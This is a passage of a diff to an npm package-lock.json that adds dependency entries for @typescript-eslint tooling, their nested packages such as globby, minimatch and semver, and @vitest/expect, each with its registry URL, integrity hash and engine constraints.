"https://opencollective.com/typescript-eslint" + } + }, + 
"node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": 
"https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/parser/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/scope-manager": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-6.21.0.tgz", + "integrity": "sha512-OwLUIWZJry80O99zvqXVEioyniJMa+d2GrqpUTqi5/v5D5rOrppJVBPa0yKCblcigC0/aYAzxxqQ1B+DS2RYsg==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/type-utils/-/type-utils-8.0.1.tgz", + "integrity": "sha512-+/UT25MWvXeDX9YaHv1IS6KI1fiuTto43WprE7pgSMswHbn1Jm9GEM4Txp+X74ifOWV8emu2AWcbLhpJAvD5Ng==", + "dev": true, + "dependencies": { + "@typescript-eslint/typescript-estree": "8.0.1", + "@typescript-eslint/utils": "8.0.1", + "debug": "^4.3.4", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + 
"integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/globby": { + "version": "11.1.0", + "resolved": 
"https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/type-utils/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-6.21.0.tgz", + "integrity": "sha512-1kFmZ1rOm5epu9NZEZm1kckCDGj5UJEf7P1kliH4LKu/RkwpsfqqGmY2OOcUs18lSlQBKLDYBOGxRVtrMN5lpg==", + "dev": true, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/typescript-estree": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-6.21.0.tgz", + "integrity": "sha512-6npJTkZcO+y2/kr+z0hc4HwNfrrP4kNYh57ek7yCNlrBjWQ1Y0OS7jiZTkgumrvkX5HkEKXFZkkdFNkaW2wmUQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "9.0.3", + "semver": "^7.5.4", + "ts-api-utils": "^1.0.1" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + 
"node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/minimatch": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz", + "integrity": "sha512-RHiac9mvaRw0x3AYRgDC1CxAP7HTcNrrECeA8YYJeWnpo+2Q5CegtZjaotWTWxDG3UeGA1coE05iH1mPjT/2mg==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/typescript-estree/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/utils": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-8.0.1.tgz", + "integrity": "sha512-CBFR0G0sCt0+fzfnKaciu9IBsKvEKYwN9UZ+eeogK1fYHg4Qxk1yf/wLQkLXlq8wbU2dFlgAesxt8Gi76E8RTA==", + "dev": true, + "dependencies": { + "@eslint-community/eslint-utils": "^4.4.0", + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/typescript-estree": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": 
"https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/utils/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/debug": { + "version": "4.3.6", + "resolved": 
"https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/utils/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/utils/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/visitor-keys": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-6.21.0.tgz", + "integrity": "sha512-JJtkDduxLi9bivAB+cYOVMtbkqdPOhZ+ZI5LC47MIRrDV4Yn2o+ZnW10Nkmr28xRpSpdJ6Sm42Hjf2+REYXm0A==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "eslint-visitor-keys": "^3.4.1" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/visitor-keys/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": 
"https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@ungap/structured-clone": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@ungap/structured-clone/-/structured-clone-1.2.0.tgz", + "integrity": "sha512-zuVdFrMJiuCDQUMCzQaD6KL28MjnqqN8XnAqiEq9PNm/hCPTSGfrXCOfwj1ow4LFb/tNymJPwsNbVePc1xFqrQ==" + }, + "node_modules/@vitest/expect": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/expect/-/expect-2.0.5.tgz", + "integrity": "sha512-yHZtwuP7JZivj65Gxoi8upUN2OzHTi3zVfjwdpu2WrvCZPLwsJ2Ey5ILIPccoW23dd/zQBlJ4/dhi7DWNyXCpA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/spy": "2.0.5", + "@vitest/utils": "2.0.5", + "chai": "^5.1.1", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/@vitest/pretty-format": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-2.0.5.tgz", + "integrity": 